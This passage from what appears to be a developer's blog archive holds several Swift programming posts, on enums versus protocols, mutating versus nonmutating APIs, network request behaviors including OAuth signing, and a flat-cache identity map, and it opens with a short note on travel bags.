bags that meet those requirements. Of the 14 bags I mentioned earlier, I think I’ve used 12 of them this year for different trips/events. Finding the right bags takes time. I’ve had the oldest of my 14 bags for some 15 years, and got the newest of them in the last year. Some bags of note: - Kathmandu Shuttle 40L — This is my current favorite travel backpack. It’s pretty much one giant pocket, so doesn’t prescribe much in terms of how you should pack, and that flexibility is really nice.
Kathmandu is an Australian company, so getting their stuff can be kind of tough, but I’m pretty happy with my pack. - I also really like the Osprey Stratos 34. It’s a bit on the small side, but a good addition to a rolling suitcase for a longer trip. It’s great for day hikes and has excellent ventilation. - Packable day packs: This backpack and this duffel bag are great. They add very little extra weight to your stuff, and they allow you to expand a little bit when you get wherever you’re going. - Wirecutter’s recommendation for travel backpacks at the time of writing is the Osprey Farpoint 55. It used to be the Tortuga Outbreaker, which I think is absolutely hideous. Accept that no one bag will work in every situation. The truth will set you free. Over the course of this week, some bloggers have written about a problem — analytics events — and proposed multiple solutions to this problem: enums, structs, and protocols. I also chimed in with a cheeky post about using inheritance and subclassing to solve this problem. I happened to have a post in my drafts about a few problems very similar to the analytics events that John proposed, and I think there’s no better time to post it than now. Without further ado: If a Swift programmer wants to bring two values together, like an Int and a String, they have two options. They can either use a “product type”, the construction of which requires you to have both values; or they can use a “sum type”, the construction of which requires you to have one value or the other. Swift is bountiful, however, and has 3 ways to express a product type and 3 ways to express a sum type. While plenty of ink has been spilled about when to use a struct, a class, or a tuple, there isn’t as much guidance on how to choose between an enum, protocol, or subclass. I personally haven’t found subclassing all that useful in Swift, as my post from earlier today implies, since protocols and enums are so powerful.
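To make the product/sum distinction above concrete, here's a minimal sketch (the type names are invented for illustration):

```swift
// Product type: you need BOTH values to construct one.
struct Credentials {
    let username: String
    let password: String
}

// Sum type: you need exactly ONE of the cases to construct one.
enum LoginMethod {
    case credentials(Credentials)
    case oauthToken(String)
}

func describe(_ method: LoginMethod) -> String {
    switch method {
    case .credentials(let credentials):
        return "password login for \(credentials.username)"
    case .oauthToken:
        return "token login"
    }
}

let method = LoginMethod.credentials(Credentials(username: "soroush", password: "hunter2"))
// describe(method) == "password login for soroush"
```

A Credentials value always carries a username and a password; a LoginMethod value carries one case's payload or the other, never both.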
In my year and a half writing Swift, I haven’t written an intentionally subclassable thing. So, for the purpose of this discussion, I’ll broadly ignore subclassing. Enums and protocols vary in a few key ways: - Completeness. Every case for an enum has to be declared when you declare the enum itself. You can’t add more cases in an extension or in a different module. On the other hand, protocols allow you to add new conformances anywhere in the codebase, even adding them across module boundaries. If that kind of flexibility is required, you have to use protocols. - Destructuring. To get data out of an enum, you have to pattern match. This requires either a switch or an if case statement. These are a bit unwieldy to use (who can even remember the case let syntax?) but are better than adding a method in the protocol for each type of variant data or casting to the concrete type and accessing it directly. Based on these differences, my hard-won advice on this is to use enums when you care which case you have, and use protocols when you don’t — when all the cases can be treated the same. I want to take a look at two examples, and decide whether enums or protocols are a better fit.
Errors
Errors are frankly a bit of a toss up. On the one hand, errors are absolutely a situation where we care which case we have; also, catch pattern matching is very powerful when it comes to enums. Let’s take a look at an example error. enum NetworkError: Error { case noInternet case statusCode(Int) case apiError(message: String) } If something throws an error, we can switch in the catch statement: do { // something that produces a network error } catch NetworkError.noInternet { // handle no internet } catch let NetworkError.statusCode(statusCode) { // use `statusCode` here to handle this error } catch { // catch any other errors } While this matching syntax is really nice, using enums for your errors comes with a few downsides. First, it hamstrings you if you’re maintaining an external library.
If you, the writer of a library, add a new enum case to an error, and a consumer of your library updates, they’ll have to change any code which exhaustively switches on your error enum. While this is desirable in some cases, it means that, per semantic versioning, you’ll have to bump the major version number of your library. This means that adding a new enum case to an external library is currently a breaking change. Swift 5 should be bringing nonexhaustive enums, which will ameliorate this problem. The second issue with enums is that this type gets muddy fast. Let’s say you want to provide conformance to the LocalizedError protocol to get good bridging to NSError. Because each case has its own scheme for how to convert its associated data into the userInfo dictionary, you’ll end up with a giant switch statement. When examining this error, it becomes apparent that the cases of the enum don’t really have anything to do with each other. NetworkError is really only acting as a convenient namespace for these errors. One approach here is to just use structs instead. struct NoInternetError: Error { } struct StatusCodeError: Error { let statusCode: Int } struct APIError: Error { let message: String } If each of these network error cases becomes its own type, we get a few cool things: a nice breakdown between types, custom initializers, easier conformance to things like LocalizedError, and it’s just as easy to pattern match: do { // something that produces a network error } catch let error as StatusCodeError { } catch let error as NoInternetError { } catch { // catch any other errors } You could even make all of the different structs conform to a protocol, called NetworkError. However, there is one downside to making each error case into its own type. Swift’s generic system requires a concrete type for all generic parameters; you can’t use a protocol there. Put another way, if the type’s signature is Result<T, E: Error>, you have to use an error enum.
If the type’s signature is Result<T>, then the error is untyped and you can use anything that conforms to Swift.Error.
API Endpoints
Because an API has a fixed number of endpoints, it can be tempting to model each of those endpoints as an enum case. However, all requests more or less have the same data: method, path, parameters, etc. If you implement your network requests as an enum, you’ll have methods with giant switch statements in them — one each for the method, path, and so on. If you think about how this data is broken up, it’s exactly flipped. When you look at a chunk of code, do you want to see all of the paths for all the endpoints in one place, or do you want to see the method, path, parameters, and so on for one request in one place? How do you want to colocate your data? For me, I definitely want to have all the data for each request in one place. This is the locality problem that Matt mentioned in his post. Protocols shine when the interface to all of the different cases is similar, so they work well for describing network requests. protocol Request { var method: Method { get } var path: String { get } // etc } Now, you can actually conform to this protocol with either a struct or enum (Inception gong), if it does happen to be the right time to use an enum for a subset of your requests. This is Dave’s point about flexibility. More importantly, however, your network architecture won’t care. It’ll just get an object conforming to the protocol and request the right data from it. Protocols confer a few other benefits here as well: - You might find that it makes life easier to conform URL to your Request protocol, and you can easily do that. - Associating a type with a protocol is possible; associating a type with an enum case is meaningfully impossible. This means you can get well-typed results back from your network architecture. Implementations of the protocol are so flexible that you can bring your own sub-abstractions as you need to.
For example, in the Beacon API, we needed to be able to get Twitter followers and following. These requests are nearly identical in their parameters, results, and everything save for the path.

struct FollowersRequest: TypedRequest {

    typealias OutputType = IDsResult

    enum Kind {
        case followers, following

        var pathComponent: String {
            return self == .followers ? "followers" : "friends"
        }
    }

    let path: String

    init(kind: Kind) {
        self.path = kind.pathComponent + "/ids.json"
    }
}

Being able to bring your own abstractions to the protocol is just one more reason protocols are the right tool for the job here. There are other cases that are useful for exploring when to use enums and protocols, but these two I think shine the most light on the problem. Use enums when you care which case you have, and use protocols when you don’t.

This is a response to Dave DeLong’s article, which is itself a response to Matt Diephouse’s article, which is itself a response to John Sundell’s article. You should go read these first. Dave starts off by saying:

    Matt starts off by saying:

        Earlier this week, John Sundell wrote a nice article about building an enum-based analytics system in Swift. He included many fine suggestions, but I believe he’s wrong about one point: that enums are the right choice.

    Therefore, I’ll start similarly: Earlier this week, Matt Diephouse wrote a nice article about building a struct-based analytics system in Swift. He included many fine suggestions, but I believe he’s wrong about one point: that structs are the right choice.

Therefore, I’ll start similarly: Earlier this week, Dave DeLong wrote a nice article about building a protocol-based analytics system in Swift. He included many fine suggestions, but I believe he’s wrong about one point: that protocols are the right choice. As examples in both articles show, analytic events can have different payloads of information that they’re going to capture.
While you can use many different approaches to solve this problem, I believe creating a deep inheritance hierarchy is the best solution. Using reference types (class in Swift) with an inheritance hierarchy yields all the upsides of the other solutions. Like John’s solution of enums, they can store data on a per-event basis. Like Matt’s solution, you can create new analytics events across module boundaries. And like Dave’s solution, you can build a hierarchy of categorization for your analytics events. However, in addition to all these benefits, subclassing brings a few extra benefits the other solutions don’t have. Subclassing allows you to store new information with each layer of your hierarchy. Let’s take a look at the metadata specifically. If you have a base class called AnalyticsEvent, a subclass for NetworkEvent, a subclass for NetworkErrorEvent, and a subclass for NoInternetNetworkErrorEvent, each subclass can bring its own components to the metadata. For example:

open class AnalyticsEvent {

    var name: String {
        fatalError("name must be provided by a subclass")
    }

    var metadata: [String: Any] {
        return ["AppVersion": version]
    }
}

open class NetworkEvent: AnalyticsEvent {

    var urlSessionConfiguration: URLSessionConfiguration

    override var metadata: [String: Any] {
        return super
            .metadata
            .merging(["UserAgent": userAgent]) { (_, new) in new }
    }
}

open class NetworkErrorEvent: NetworkEvent {

    var error: Error

    override var metadata: [String: Any] {
        return super
            .metadata
            .merging(["ErrorCode": error.code]) { (_, new) in new }
    }
}

open class NoInternetNetworkErrorEvent: NetworkErrorEvent {

    override var name: String {
        return "NoInternetNetworkErrorEvent"
    }

    override var metadata: [String: Any] {
        return super
            .metadata
            .merging(["Message": "No Internet"]) { (_, new) in new }
    }
}

As you can see, this reduces duplication between various types of analytics events. Each layer refers to the layers above it, in an almost recursive style.
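The layered metadata merging is easy to see in action. Here is a condensed, compilable sketch of the same idea, with the version and user-agent values hard-coded as stand-ins (they are placeholders, not part of the original):

```swift
// Each layer of the hierarchy contributes its own keys to metadata.
class AnalyticsEvent {
    var name: String {
        fatalError("name must be provided by a subclass")
    }
    var metadata: [String: Any] {
        return ["AppVersion": "1.0"]  // placeholder version
    }
}

class NetworkEvent: AnalyticsEvent {
    override var metadata: [String: Any] {
        // Merge this layer's keys on top of the superclass's keys.
        return super.metadata.merging(["UserAgent": "MyApp/1.0"]) { _, new in new }
    }
}

class NoInternetNetworkErrorEvent: NetworkEvent {
    override var name: String { return "NoInternetNetworkErrorEvent" }
    override var metadata: [String: Any] {
        return super.metadata.merging(["Message": "No Internet"]) { _, new in new }
    }
}

let event = NoInternetNetworkErrorEvent()
// event.metadata now contains keys contributed by every layer:
// AppVersion (base), UserAgent (network), Message (no-internet).
```

Each `super.metadata` call walks one layer up, so the final dictionary is the union of every layer’s contribution.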
I hope this article has convinced you to try subclassing to solve your next problem. While Swift gives us many different ways to solve a problem, I’m confident that a deep inheritance hierarchy is the solution for this one.

Swift structs can provide mutating and nonmutating versions of their functions. However, the Swift standard library is inconsistent about when it provides one form of a function or the other. Some APIs come in only mutating forms, some come in only nonmutating forms, and some come in both. Because both types of functions are useful in different situations, I argue that almost all such functions should be provided in both versions. In this post, we’ll examine when these different forms are useful, example APIs that provide one form but not the other, and solutions for this problem. (Quick sidebar here: I’ll be referring to functions that return a new struct with some field changed as nonmutating functions. Unfortunately, Swift also includes a keyword called nonmutating, which is designed for property setters that don’t require the struct to be copied when they’re set. Because I think that nonmutating is the best word to describe functions that return an altered copy of the original, I’ll keep using that language here. Apologies for the confusion.)

Mutating and Nonmutating Forms

These two forms, mutating and nonmutating, are useful in different cases. First, let’s look at when the nonmutating version is more useful.
This code, taken from Beacon’s OAuthSignatureGenerator, uses a long chain of immutable functions to make its code cleaner and more uniform:

public var authorizationHeader: String {
    let headerComponents = authorizationParameters
        .dictionaryByAdding("oauth_signature", value: self.oauthSignature)
        .urlEncodedQueryPairs(using: self.dataEncoding)
        .map({ pair in "\(pair.0)=\"\(pair.1)\"" })
        .sorted()
        .joined(separator: ", ")
    return "OAuth " + headerComponents
}

However, it wouldn’t be possible without an extension adding dictionaryByAdding(_:value:), the nonmutating version of the subscript setter. Here’s another, slightly more academic example. Inverting a binary tree is more commonly a punchline for bad interviews than practically useful, but the algorithm illustrates this point nicely. To start, let’s define a binary tree as an enum, like so:

indirect enum TreeNode<Element> {
    case children(left: TreeNode<Element>, right: TreeNode<Element>, value: Element)
    case leaf(value: Element)
}

To invert this binary tree, the tree on the left goes on the right, and the tree on the right goes on the left. The recursive form of the nonmutating version is simple and elegant:

extension TreeNode {
    func inverted() -> TreeNode<Element> {
        switch self {
        case let .children(left, right, value):
            return .children(left: right.inverted(), right: left.inverted(), value: value)
        case let .leaf(value: value):
            return .leaf(value: value)
        }
    }
}

Whereas the recursive mutating version contains lots of extra noise and nonsense:

extension TreeNode {
    mutating func invert() {
        switch self {
        case let .children(left, right, value):
            var rightCopy = right
            rightCopy.invert()
            var leftCopy = left
            leftCopy.invert()
            self = .children(left: rightCopy, right: leftCopy, value: value)
        case .leaf(value: _):
            break
        }
    }
}

Mutating functions are also useful, albeit in different contexts. We primarily work in apps that have a lot of state, and sometimes that state is represented by data in structs.
When mutating that state, we often want to do it in place. Swift gives us lots of first-class affordances for this: the mutating keyword was added especially for this behavior, and changing any property on a struct acts as a mutating function as well, reassigning the reference to a new copy of the struct with the value changed. There are concrete examples as well. If you’re animating a CGAffineTransform on a view, that code currently has to look something like this:

UIView.animate(withDuration: 0.25, animations: {
    view.transform = view.transform.rotated(by: .pi)
})

Because the transformation APIs are all nonmutating, you have to manually assign the struct back to the original reference, causing duplicated, ugly code. If there were a mutating rotate(by:) function, then this code would be much cleaner:

UIView.animate(withDuration: 0.25, animations: {
    view.transform.rotate(by: .pi)
})

The APIs aren’t consistent

The primary problem here is that while both mutating functions and nonmutating functions are useful, not all APIs provide versions of both. Some APIs include only mutating forms. This is common with collections. Both the APIs for adding items to collections, like Array.append, Dictionary.subscript, and Set.insert, and the APIs for removing items from collections, like Array.remove(at:), Dictionary.removeValue(forKey:), and Set.remove, have this issue. Some APIs include only nonmutating forms. filter and map are defined on Sequence, and they return arrays, so they can’t be mutating (because Sequence objects can’t necessarily be mutated). However, we could have a mutating filterInPlace function on Array. The aforementioned CGAffineTransform functions also fall in this category. They only include nonmutating versions, which is great for representing a CGAffineTransform as a chain of transformations, but not so great for mutating an existing transform, say, on a view. Some APIs provide both. I think sorting is a great example of getting this right.
Sequence includes sorted(by:), which is a nonmutating function that returns a sorted array, whereas MutableCollection (the first protocol in the Sequence and Collection hierarchy that allows mutation) includes sort(by:). This way, users of the API can choose whether they want a mutating sort or a nonmutating sort, and each is available in the first API where it’s possible. Array, of course, conforms to both MutableCollection and Sequence, so it gets both of them. Another example of an API that gets this right: Set includes union (nonmutating) and formUnion (mutating). (I could quibble with these names, but I’m happy that both versions of the API exist.) Swift 4’s new Dictionary merging APIs also include both merge(_:uniquingKeysWith:) and merging(_:uniquingKeysWith:).

Bridging Between the Two

The interesting thing with this problem is that, because of the way Swift is designed, it’s really easy to bridge from one form to the other. If you have the mutating version of any function:

mutating func mutatingVersion() { ... }

You can synthesize a nonmutating version:

func nonMutatingVersion() -> Self {
    var copy = self
    copy.mutatingVersion()
    return copy
}

And vice versa, if you already have a nonmutating version:

func nonMutatingVersion() -> Self { ... }

mutating func mutatingVersion() {
    self = self.nonMutatingVersion()
}

As long as the type returned by the nonmutating version is the same as Self, this trick works for any API, which is awesome. The only thing you really need is a name for the alternate version.

Leaning on the Compiler

With this, I think it should be possible to have the compiler trivially synthesize one version from the other for us. Imagine something like this:

extension Array {
    @synthesizeNonmutating(appending(_:))
    mutating func append(_ newElement: Element) {
        // ...
    }
}

The compiler would use the same trick above — create a copy, mutate the copy, and return it — to synthesize a nonmutating version of this function.
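Pending compiler support like that, the same synthesis can be written by hand today. Here is a sketch showing both directions of the bridge; the names appending(_:) and formFilter(_:) are my own inventions, not standard library APIs:

```swift
extension Array {
    // Nonmutating version synthesized from the mutating append:
    // copy, mutate the copy, return it.
    func appending(_ newElement: Element) -> [Element] {
        var copy = self
        copy.append(newElement)
        return copy
    }

    // Mutating version synthesized from the nonmutating filter:
    // compute the new value, assign it back to self.
    mutating func formFilter(_ isIncluded: (Element) -> Bool) {
        self = self.filter(isIncluded)
    }
}

let chained = [1, 2].appending(3)   // usable in a chain of expressions

var evens = [1, 2, 3, 4]
evens.formFilter { $0 % 2 == 0 }    // mutates in place
```

Both bridges are mechanical, which is exactly why having the compiler do it seems plausible.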
You could also have a @synthesizeMutating keyword. Types could of course choose not to use this shorthand, which they might do in instances where there are optimizations for one form or another. However, getting tooling like this means that API designers no longer have to consider whether their APIs are likely to be used in mutating or nonmutating ways, and they can easily add both forms. Because each form is useful in different contexts, providing both allows the consumer of an API to choose which form they want and when.

Very early this year, I posted about request behaviors. These simple objects can help you factor out small bits of reused UI, persistence, and validation code related to your network. If you haven’t read the post, it lays the groundwork for this post. Request behaviors are objects that can execute arbitrary code at various points during some request’s execution: before sending, after success, and after failure. They also contain hooks to add any necessary headers and arbitrarily modify the URL request. If you come from the server world, you can think of request behaviors as a sort of reverse middleware. It’s a simple pattern, but there are lots of very powerful behaviors that can be built on top of it. In the original post, I proposed three behaviors that, because of their access to some piece of global state, were particularly hard to test: BackgroundTaskBehavior, NetworkActivityIndicatorBehavior, and AuthTokenHeaderBehavior. Those are useful behaviors, but in this post, I want to show a few more, maybe less obvious, behaviors that I’ve used across a few apps.

API Verification

One of the apps where I’ve employed this pattern needs a very special behavior. It relies on receiving 2XX status codes from sync API requests. When a request returns a 200, it assumes that the sync request was successfully executed, and it can remove it from the queue.
The problem is that captive portals, like those used at hotels or coffee shops, will often redirect any request to their special login page, which returns a 200. There are a few ways to handle this, but the solution we opted for was to send a special header that the server would turn around and return completely unmodified. No returned header? Probably a captive portal or some other tomfoolery. To implement this, the server used a very straightforward middleware, and the client needed some code to handle it as well. Perfect for a request behavior.

class APIVerificationBehavior: RequestBehavior {

    let nonce = UUID().uuidString

    var additionalHeaders: [String: String] {
        return ["X-API-Nonce": nonce]
    }

    func afterSuccess(response: AnyResponse) throws {
        guard let returnedNonce = response.httpResponse.allHeaderFields["X-API-Nonce"] as? String,
            returnedNonce == nonce else {
                throw APIError(message: "Sync request intercepted.")
        }
    }
}

It requires a small change: making the afterSuccess method a throwing method. This lets the request behavior check conditions and fail the request if they’re not met, and it’s a straightforward compiler-driven change. Also, because the request behavior architecture is so testable, changes like this to the network code can be reliably tested, making them much easier.

OAuth Behavior

Beacon relies on Twitter, which uses OAuth for authentication and user identification. At the time I wrote the code, none of the Swift OAuth libraries worked correctly on Linux, so there was a process of extracting, refactoring, and, for some components, rewriting the libraries to make them work right. While I was working on this, I was hoping to test out one of the reasons I wanted to create request behaviors in the first place: to decouple the authentication protocol (OAuth, in this case) from the data that any given request requires.
You should be able to transparently add OAuth to a request without having to modify the request struct or the network client at all. Extracting the code to generate the OAuth signature was a decent amount of work. Debugging in particular is hard for OAuth, and I recommend this page on Twitter’s API docs, which walks you through the whole process and shows you what your data should look like at each step. (I hope this link doesn’t just break when Twitter inevitably changes its documentation format.) I also added tests for each step, so that if anything failed, it would be obvious which steps succeeded and which steps failed. Once you have something to generate the OAuth signature (called OAuthSignatureGenerator here), the request behavior for adding OAuth to a request turns out to not be so bad.

struct Credentials {
    let key: String
    let secret: String
}

class OAuthRequestBehavior: RequestBehavior {

    var consumerCredentials: Credentials

    var credentials: Credentials

    init(consumerCredentials: Credentials, credentials: Credentials) {
        self.consumerCredentials = consumerCredentials
        self.credentials = credentials
    }

    func modify(request: URLRequest) -> URLRequest {
        let generator = OAuthSignatureGenerator(consumerCredentials: consumerCredentials, credentials: credentials, request: request)
        var mutableRequest = request
        mutableRequest.setValue(generator.authorizationHeader, forHTTPHeaderField: "Authorization")
        return mutableRequest
    }
}

Using modify(request:) to perform some mutation of the request, we can add the header for the OAuth signature from OAuthSignatureGenerator. Digging into the nitty-gritty of OAuth is out of the scope of this post, but you can find the code for the signature generator here. The only thing of note is that this code relies on Vapor’s SHA1 and base 64 encoding, which you’ll have to swap out for implementations more friendly to your particular environment.
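One fiddly piece of that signature work can be shown in isolation: OAuth 1.0 (RFC 5849) mandates a stricter percent-encoding than the usual URL-query character set, encoding everything except ASCII letters, digits, and "-._~". Here is a sketch; the extension name is my own, not from the library discussed above:

```swift
import Foundation

extension String {
    // RFC 5849 section 3.6: only ALPHA, DIGIT, "-", ".", "_", "~"
    // may pass through unencoded. Everything else must be %-escaped.
    var oauthPercentEncoded: String {
        let unreserved = CharacterSet(charactersIn:
            "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~")
        return addingPercentEncoding(withAllowedCharacters: unreserved) ?? self
    }
}

let encoded = "Ladies + Gentlemen".oauthPercentEncoded
// "Ladies%20%2B%20Gentlemen" — note the space AND the plus are escaped,
// which is exactly where looser encoders tend to produce invalid signatures.
```

Getting this encoding wrong is one of the most common reasons a hand-rolled OAuth signature fails verification, which is why the step-by-step comparison against Twitter’s worked example is so valuable.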
When it’s time to use this behavior to create a client, you can create a client specific to the Twitter API, and then you’re good to go:

let twitterClient = NetworkClient(configuration: RequestConfiguration(baseURLString: "", defaultRequestBehavior: oAuthBehavior))

Persistence

I also explored saving things to Core Data via request behaviors, without having to trouble the code that sends the request with that responsibility. This was another promise of the request behavior pattern: if you could write reusable and parameterizable behaviors for saving things to Core Data, you could cut down on a lot of boilerplate. However, when implementing this, we ran into a wrinkle. Each request needs to finish saving to Core Data before the request’s promise is fulfilled. However, the current afterSuccess(result:) and afterFailure(error:) methods are synchronous and called on the main thread. Saving lots of data to Core Data can take seconds, during which the UI can’t be locked up. We need to change these methods to allow asynchronous work. If we define a function that takes a Promise and returns a Promise, we can completely subsume all three methods: beforeSend, afterSuccess, and afterFailure.

func handleRequest(promise: Promise<AnyResponse>) -> Promise<AnyResponse> {
    // before request
    return promise
        .then({ response in
            // after success
        })
        .catch({ error in
            // after failure
        })
}

Now, we can do asynchronous work when the request succeeds or fails, and we can also cause a succeeding request to fail if some condition isn’t met (like in the first example in this post) by throwing from the then block. Core Data architecture varies greatly from app to app, and I’m not here to prescribe any particular pattern. In this case, we have a foreground context (for reading) and a background context (for writing). We wanted to simplify the creation of a Core Data request behavior; all you should have to provide is a context and a method that will be performed by that context.
Building a protocol around that, we ended up with something like this:

protocol CoreDataRequestBehavior: RequestBehavior {

    var context: NSManagedObjectContext { get }

    func performBeforeSave(in context: NSManagedObjectContext, withResponse response: AnyResponse) throws
}

And that protocol is extended to handle all of the boilerplate mapping to and from the Promise:

extension CoreDataRequestBehavior {
    func handleRequest(promise: Promise<AnyResponse>) -> Promise<AnyResponse> {
        return promise.then({ response in
            return Promise<AnyResponse>(work: { fulfill, reject in
                self.context.perform({
                    do {
                        try self.performBeforeSave(in: self.context, withResponse: response)
                        try self.context.save()
                        fulfill(response)
                    } catch let error {
                        reject(error)
                    }
                })
            })
        })
    }
}

Creating a type that conforms to CoreDataRequestBehavior means that you provide a context and a function to modify that context before saving. That function will be called on the right thread, and the completion of the request will be delayed until the work in the Core Data context is completed. As an added bonus, performBeforeSave is a throwing function, so it’ll handle errors for you by failing the request. On top of CoreDataRequestBehavior, you can build more complex behaviors, such as a behavior that is parameterized on a managed object type and can save an array of objects of that type to Core Data. Request behaviors provide the hooks to attach complex behavior to a request. Any side effect that needs to happen during a network request is a great candidate for a request behavior. (If these side effects occur for more than one request, all the better.) These three examples highlight more advanced usage of request behaviors.

The model layer of a client is a tough nut to crack. Because it’s not the canonical representation of the data (that representation lives on the server), the data must live in a fundamentally transient form.
The version of the data that the app has is essentially a cache of what lives on the network (whether that cache is in memory or on disk), and if there’s anything that’s true about caches, it’s that they will always end up with stale data. That truth is multiplied by the number of caches you have in your app. Reducing the number of cached versions of any given object decreases the likelihood that it will be out of date. Core Data has an internal feature that ensures that there is never more than one instance of an object for a given identifier (within the same managed object context). They call this feature “uniquing”, but it is known more broadly as the identity map pattern. I want to steal it without adopting the rest of the baggage of Core Data. I think of this concept as a “flat cache”. A flat cache is basically just a big dictionary. The keys are a composite of an object’s type name and the object’s ID, and the value is the object. A flat cache normalizes the data in it, like a relational database, and all object-to-object relationships go through the flat cache. A flat cache confers several interesting benefits.

- Normalizing the data means that you’ll use less bandwidth while the data is in flight, and less memory while the data is at rest.
- Because data is normalized, modifying or updating a resource in one place modifies it everywhere.
- Because relationships to other entities go through the flat cache, back references with structs are now possible. Back references with classes don’t have to be weak.
- With a flat cache of structs, any mutation deep in a nested struct only requires the object in question to change, instead of the object and all of its parents.

In this post, we’ll discuss how to make this pattern work in Swift. First, you’ll need the composite key.
struct FlatCacheKey: Equatable, Hashable {

    let typeName: String
    let id: String

    static func == (lhs: FlatCacheKey, rhs: FlatCacheKey) -> Bool {
        return lhs.typeName == rhs.typeName && lhs.id == rhs.id
    }

    var hashValue: Int {
        return typeName.hashValue ^ id.hashValue
    }
}

We can use a protocol to make the generation of flat cache keys easier:

protocol Identifiable {
    var id: String { get }
}

protocol Cachable: Identifiable { }

extension Cachable {
    static var typeName: String {
        return String(describing: self)
    }

    var flatCacheKey: FlatCacheKey {
        return FlatCacheKey(typeName: Self.typeName, id: id)
    }
}

All of our model objects already have IDs, so they can trivially conform to Cachable and Identifiable. Next, let’s get to the basic flat cache.

class FlatCache {

    static let shared = FlatCache()

    private var storage: [FlatCacheKey: Any] = [:]

    func set<T: Cachable>(value: T) {
        storage[value.flatCacheKey] = value
    }

    func get<T: Cachable>(id: String) -> T? {
        let key = FlatCacheKey(typeName: T.typeName, id: id)
        return storage[key] as? T
    }

    func clearCache() {
        storage = [:]
    }
}

Not too much to say here: just a private dictionary with get and set methods. Notably, the set method only takes one parameter, since the key for the flat cache can be derived from the value. Here’s where the interesting stuff happens. Let’s say you have a Post with an Author. Typically, the Author would be a child of the Post:

struct Author {
    let name: String
}

struct Post {
    let author: Author
    let content: String
}

However, if you wanted back references (so that you could get all the posts by an author, let’s say), this isn’t possible with value types. This kind of relationship would cause a reference cycle, which can never happen with Swift structs. If you gave the Author a list of Post objects, each Post would be a full copy, including the Author, which would have to include the author’s posts, et cetera.
You could switch to classes, but the back reference would cause a retain cycle, so the reference would need to be weak. You’d have to manage these weak relationships back to the parent manually. Neither of these solutions is ideal. A flat cache treats relationships a little differently. With a flat cache, each relationship is fetched from the centralized identity map. In this case, the Post has an authorID and the Author has a list of postIDs:

struct Author: Identifiable, Cachable {
    let id: String
    let name: String
    let postIDs: [String]
}

struct Post: Identifiable, Cachable {
    let id: String
    let authorID: String
    let content: String
}

Now, you still have to do some work to fetch the object itself. To get the author for a post, you would write something like:

FlatCache.shared.get(id: post.authorID) as Author?

You could put this into an extension on the Post to make it a little cleaner:

extension Post {
    var author: Author? {
        return FlatCache.shared.get(id: authorID)
    }
}

But this is pretty painful to do for every single relationship in your model layer. Fortunately, it’s something that can be generated! By adding an annotation to the ID property, you can tell a tool like Sourcery to generate the computed accessors for you. I won’t belabor the explanation of the template, but you can find it here. If you have trouble reading it or understanding how it works, you can read the Sourcery in Practice post. It will let you write Swift code like this:

struct Author {
    let name: String

    // sourcery: relationshipType = Post
    let postIDs: [String]
}

struct Post {
    // sourcery: relationshipType = Author
    let authorID: String

    let content: String
}

Which will generate a file that looks like this:

// Generated using Sourcery 0.8.0 —
// DO NOT EDIT

extension Author {
    var posts: [Post] {
        return postIDs.flatMap({ id -> Post? in
            return FlatCache.shared.get(id: id)
        })
    }
}

extension Post {
    var author: Author? {
        return FlatCache.shared.get(id: authorID)
    }
}

This is the bulk of the pattern.
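Putting the pieces together, here is a self-contained sketch of the whole pattern in action. It condenses the code above into one runnable unit (using synthesized Hashable for brevity, and invented sample data):

```swift
// The composite key: type name + ID.
struct FlatCacheKey: Hashable {
    let typeName: String
    let id: String
}

protocol Cachable {
    var id: String { get }
}

extension Cachable {
    static var typeName: String { return String(describing: self) }
    var flatCacheKey: FlatCacheKey {
        return FlatCacheKey(typeName: Self.typeName, id: id)
    }
}

// The flat cache itself: one big dictionary behind typed accessors.
final class FlatCache {
    static let shared = FlatCache()
    private var storage: [FlatCacheKey: Any] = [:]

    func set<T: Cachable>(value: T) {
        storage[value.flatCacheKey] = value
    }
    func get<T: Cachable>(id: String) -> T? {
        return storage[FlatCacheKey(typeName: T.typeName, id: id)] as? T
    }
}

// Relationships are stored as IDs and resolved through the cache,
// which is what makes struct back references possible.
struct Author: Cachable {
    let id: String
    let name: String
    let postIDs: [String]
    var posts: [Post] {
        return postIDs.compactMap { FlatCache.shared.get(id: $0) }
    }
}

struct Post: Cachable {
    let id: String
    let authorID: String
    let content: String
    var author: Author? { return FlatCache.shared.get(id: authorID) }
}

FlatCache.shared.set(value: Author(id: "a1", name: "Soroush", postIDs: ["p1"]))
FlatCache.shared.set(value: Post(id: "p1", authorID: "a1", content: "Hello"))

let post: Post? = FlatCache.shared.get(id: "p1")
// post?.author and author.posts both resolve through the flat cache,
// giving a two-way relationship between two value types.
```

Note that both sides of the relationship resolve through the shared cache, so updating an Author in one place updates it for every Post that references it.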
However, there are a few considerations to examine.

JSON

Building this structure from a tree of nested JSON is messy and tough. The system works a lot better if the structure of the JSON mirrors the structure of the flat cache. All the objects exist in a big dictionary at the top level (one key for each type of object), and the relationships are defined by IDs. When a new JSON payload comes in, you can iterate over this top level, create all your local objects, and store them in the flat cache. Inform the requester of the JSON that the new objects have been downloaded, and then it can fetch the relevant objects directly from the flat cache. The ideal structure of the JSON looks a lot like JSON API, although I’m not surpassingly familiar with JSON API.

Missing Values

One big difference between managing relationships directly and managing them through the flat cache is that with the flat cache, there is a (small) chance that the relationship won’t be there. This might happen because of a bug on the server side, or it might happen because of a consistency error when mutating the data in the flat cache (we’ll discuss mutation more in a moment). There are a few ways to handle this:

- Return an Optional. What we chose to do for this app is return an optional. There are a lot of ways of handling missing values with optionals, including optional chaining, force-unwrapping, if let, and flatmapping, so it isn’t too painful to have to deal with an optional, and there aren’t any seriously deleterious effects on your app if a value is missing.
- Force unwrap. You could choose to force-unwrap the relationship. That’s putting a lot of trust in the source of the data (JSON in our case). If a relationship is missing because of a bug on your server, your app will crash. This is really bad, but on the bright side, you’ll get a crash report for missing relationships, and you can fix them on the server side quickly.
- Return a Promise.
While a promise is the most complex of these three solutions to deal with at the call site, the benefit is that if the relationship doesn’t exist, you can fetch it fresh from the server and fulfill the promise a few seconds later.

Each choice has its downsides. However, one benefit of code generation is that you can support more than one option. You can synthesize both a promise and an optional getter for each relationship, and use whichever one you want at the call site.

Mutability

